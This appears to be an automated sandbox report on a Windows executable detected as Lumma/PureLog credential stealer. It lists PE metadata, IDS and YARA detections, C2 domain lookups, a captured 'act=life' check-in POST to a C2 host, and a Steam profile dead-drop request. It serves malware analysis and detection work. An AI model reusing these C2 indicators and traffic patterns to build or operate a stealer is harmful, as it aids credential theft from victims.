                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x19a0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x1941e40x19420013cf54b1b8c948d473c300ce15d70740False0.7979122767166719data7.498920761662283IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x1980000x5680x60054162d51ef77a776df8187ff113dc38eFalse0.4108072916666667data3.970234351915508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x19a0000xc0x20065d83e1f73a9e96c123f859063b8aad4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_VERSION0x1980a00x2dcdata0.44672131147540983
                                                                                              RT_MANIFEST0x19837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain
                                                                                              DescriptionData
                                                                                              Translation0x0000 0x04b0
                                                                                              Comments
                                                                                              CompanyName
                                                                                              FileDescription1
                                                                                              FileVersion1.0.0.0
                                                                                              InternalName1.exe
                                                                                              LegalCopyrightCopyright 2018
                                                                                              LegalTrademarks
                                                                                              OriginalFilename1.exe
                                                                                              ProductName1
                                                                                              ProductVersion1.0.0.0
                                                                                              Assembly Version1.0.0.0

                                                                                              Download Network PCAP: filteredfull

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-04-27T05:33:12.042328+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449713104.21.32.1443TCP
                                                                                              2025-04-27T05:33:31.658514+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449713104.21.32.1443TCP
                                                                                              2025-04-27T05:33:31.658514+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449713104.21.32.1443TCP
                                                                                              2025-04-27T05:33:31.666749+02002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4621281.1.1.153UDP
                                                                                              2025-04-27T05:33:31.839059+02002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4538171.1.1.153UDP
                                                                                              2025-04-27T05:33:31.997019+02002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.4632671.1.1.153UDP
                                                                                              2025-04-27T05:33:32.159469+02002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.4605671.1.1.153UDP
                                                                                              2025-04-27T05:33:32.325443+02002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.4570421.1.1.153UDP
                                                                                              2025-04-27T05:33:32.490041+02002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.4642271.1.1.153UDP
                                                                                              2025-04-27T05:33:32.653417+02002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.4553681.1.1.153UDP
                                                                                              2025-04-27T05:33:32.822532+02002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.4588471.1.1.153UDP
                                                                                              2025-04-27T05:33:33.426687+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44972223.52.218.12443TCP
                                                                                              2025-04-27T05:33:33.824801+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44972223.52.218.12443TCP
                                                                                              • Total Packets: 35
                                                                                              • 443 (HTTPS)
                                                                                              • 53 (DNS)
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 27, 2025 05:33:11.726566076 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:11.726603031 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:11.726680040 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:11.729679108 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:11.729693890 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:12.042243004 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:12.042327881 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:12.049531937 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:12.049551010 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:12.049751043 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:12.101322889 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:12.137073994 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:12.137115955 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:12.137160063 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.658548117 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.658611059 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.658682108 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:31.659921885 CEST49713443192.168.2.4104.21.32.1
                                                                                              Apr 27, 2025 05:33:31.659939051 CEST44349713104.21.32.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.138675928 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.138710022 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.138773918 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.139448881 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.139461040 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.426487923 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.426687002 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.428261042 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.428268909 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.428463936 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.429790020 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.476273060 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.824841022 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.824863911 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.824877024 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.824939966 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.824959993 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.824987888 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.825016022 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.962210894 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.962259054 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.962311983 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.962336063 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.962385893 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.974440098 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.974508047 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.974555016 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.974594116 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.974724054 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.974735975 CEST4434972223.52.218.12192.168.2.4
                                                                                              Apr 27, 2025 05:33:33.974750996 CEST49722443192.168.2.423.52.218.12
                                                                                              Apr 27, 2025 05:33:33.974756002 CEST4434972223.52.218.12192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 27, 2025 05:33:11.546150923 CEST6198753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST53619871.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.666749001 CEST6212853192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:31.835705042 CEST53621281.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.839059114 CEST5381753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:31.993983030 CEST53538171.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:31.997019053 CEST6326753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.156656981 CEST53632671.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.159468889 CEST6056753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.322485924 CEST53605671.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.325443029 CEST5704253192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.487524033 CEST53570421.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.490041018 CEST6422753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.650350094 CEST53642271.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.653417110 CEST5536853192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.819885015 CEST53553681.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.822531939 CEST5884753192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:32.995897055 CEST53588471.1.1.1192.168.2.4
                                                                                              Apr 27, 2025 05:33:32.997597933 CEST6071353192.168.2.41.1.1.1
                                                                                              Apr 27, 2025 05:33:33.137676001 CEST53607131.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Apr 27, 2025 05:33:11.546150923 CEST192.168.2.41.1.1.10x2817Standard query (0)surmisehotte.clickA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:31.666749001 CEST192.168.2.41.1.1.10x45e7Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:31.839059114 CEST192.168.2.41.1.1.10x3872Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:31.997019053 CEST192.168.2.41.1.1.10xce15Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.159468889 CEST192.168.2.41.1.1.10x3cb9Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.325443029 CEST192.168.2.41.1.1.10x230fStandard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.490041018 CEST192.168.2.41.1.1.10x6450Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.653417110 CEST192.168.2.41.1.1.10x661dStandard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.822531939 CEST192.168.2.41.1.1.10xc23aStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.997597933 CEST192.168.2.41.1.1.10x5c1fStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:11.719497919 CEST1.1.1.1192.168.2.40x2817No error (0)surmisehotte.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:31.835705042 CEST1.1.1.1192.168.2.40x45e7Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:31.993983030 CEST1.1.1.1192.168.2.40x3872Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.156656981 CEST1.1.1.1192.168.2.40xce15Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.322485924 CEST1.1.1.1192.168.2.40x3cb9Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.487524033 CEST1.1.1.1192.168.2.40x230fName error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.650350094 CEST1.1.1.1192.168.2.40x6450Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.819885015 CEST1.1.1.1192.168.2.40x661dName error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:32.995897055 CEST1.1.1.1192.168.2.40xc23aName error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 27, 2025 05:33:33.137676001 CEST1.1.1.1192.168.2.40x5c1fNo error (0)steamcommunity.com23.52.218.12A (IP address)IN (0x0001)false
                                                                                              • surmisehotte.click
                                                                                              • steamcommunity.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449713104.21.32.14436536C:\Users\user\Desktop\stage6.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-27 03:33:12 UTC265OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: surmisehotte.click
                                                                                              2025-04-27 03:33:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2025-04-27 03:33:31 UTC238INHTTP/1.1 522 <none>
                                                                                              Date: Sun, 27 Apr 2025 03:33:31 GMT
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              Cache-Control: private, no-store
                                                                                              Cf-Cache-Status: DYNAMIC
                                                                                              CF-RAY: 936b41cfe8c60fe5-LAX
                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.44972223.52.218.124436536C:\Users\user\Desktop\stage6.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-27 03:33:33 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              2025-04-27 03:33:33 UTC1974INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Sun, 27 Apr 2025 03:33:33 GMT
                                                                                              Content-Length: 29965
                                                                                              Connection: close
                                                                                              Set-Cookie: sessionid=ad7b0c4e88d72b577c8b6cfa; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=US%7Ccf72e8d7385b2d4d64dd054efa94cd8a; path=/; secure; HttpOnly; SameSite=None
                                                                                              2025-04-27 03:33:33 UTC14410INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22
                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"
                                                                                              2025-04-27 03:33:33 UTC10166INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e
                                                                                              Data Ascii: href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommun
                                                                                              2025-04-27 03:33:33 UTC5389INData Raw: 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 32 5f 31 30 30 33 30 30 5f 70 72 6f 66 69 6c 65 5f 26 71 75 6f 74 3b 7d 22 20 64 61 74 61 2d 75 73 65 72 69 6e 66 6f 3d 22 5b 5d 22 20 64
                                                                                              Data Ascii: ity&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&quot;2_100300_profile_&quot;}" data-userinfo="[]" d


                                                                                              050100s020406080100

                                                                                              Click to jump to process

                                                                                              050100s0.00102030MB

                                                                                              Click to jump to process

                                                                                              • File
                                                                                              • Registry

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:23:33:10
                                                                                              Start date:26/04/2025
                                                                                              Path:C:\Users\user\Desktop\stage6.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\stage6.exe"
                                                                                              Imagebase:0xe80000
                                                                                              File size:1'657'856 bytes
                                                                                              MD5 hash:03BE1EE0944764446CD61BE6AE8CC497
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:23:33:10
                                                                                              Start date:26/04/2025
                                                                                              Path:C:\Users\user\Desktop\stage6.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\stage6.exe"
                                                                                              Imagebase:0x5d0000
                                                                                              File size:1'657'856 bytes
                                                                                              MD5 hash:03BE1EE0944764446CD61BE6AE8CC497
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                              Executed Functions

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Dq
                                                                                              • API String ID: 0-144822681
                                                                                              • Opcode ID: 93b9533fab7cd42d01dd1e46e35eccb3af9b4e41fc02121211e619969f63ecc2
                                                                                              • Instruction ID: 8582d0fcf67046d17e030920701600936e9f215caca254fc3367352e0c25ecbf
                                                                                              • Opcode Fuzzy Hash: 93b9533fab7cd42d01dd1e46e35eccb3af9b4e41fc02121211e619969f63ecc2
                                                                                              • Instruction Fuzzy Hash: 57D19074A00218CFDB54DFA9D994B9DBBF2BF88300F1085A9D509AB3A5DB35A981CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q
                                                                                              • API String ID: 0-1467158625
                                                                                              • Opcode ID: 860519358ff35d0e476e47a5b32ec813d45fb0b681699a10bcbc39bcc01126bc
                                                                                              • Instruction ID: ebb9ef55d7d178f519c2b93dd836d57b0d93de2d31920478dc28cc1fa8692957
                                                                                              • Opcode Fuzzy Hash: 860519358ff35d0e476e47a5b32ec813d45fb0b681699a10bcbc39bcc01126bc
                                                                                              • Instruction Fuzzy Hash: D3725A74E15349CFDB16DBA9C8A8AEEBBB1FF49301F11805AD511AB391C7346882CF61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q
                                                                                              • API String ID: 0-1467158625
                                                                                              • Opcode ID: 6d44635f27adcdef95fa61db50ea34eee7555dc1f9253ce89d6fea10c877f025
                                                                                              • Instruction ID: 7e0f70356837790828cade82eec5216348ae3a4782922d2488087e48dffbe164
                                                                                              • Opcode Fuzzy Hash: 6d44635f27adcdef95fa61db50ea34eee7555dc1f9253ce89d6fea10c877f025
                                                                                              • Instruction Fuzzy Hash: 27F1D434E11219DFCB19DFA9E9986ECBBB6FF89312F204029E416A7354CB356985CF10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q
                                                                                              • API String ID: 0-1467158625
                                                                                              • Opcode ID: 3beac9650a51621057820d59de8dab9365953b8a7d1730594e6abdeb97adb630
                                                                                              • Instruction ID: e02a341cf4040f17149bb05e634e59fc76bbff80f48c20e9ab6d0108c00b6f4e
                                                                                              • Opcode Fuzzy Hash: 3beac9650a51621057820d59de8dab9365953b8a7d1730594e6abdeb97adb630
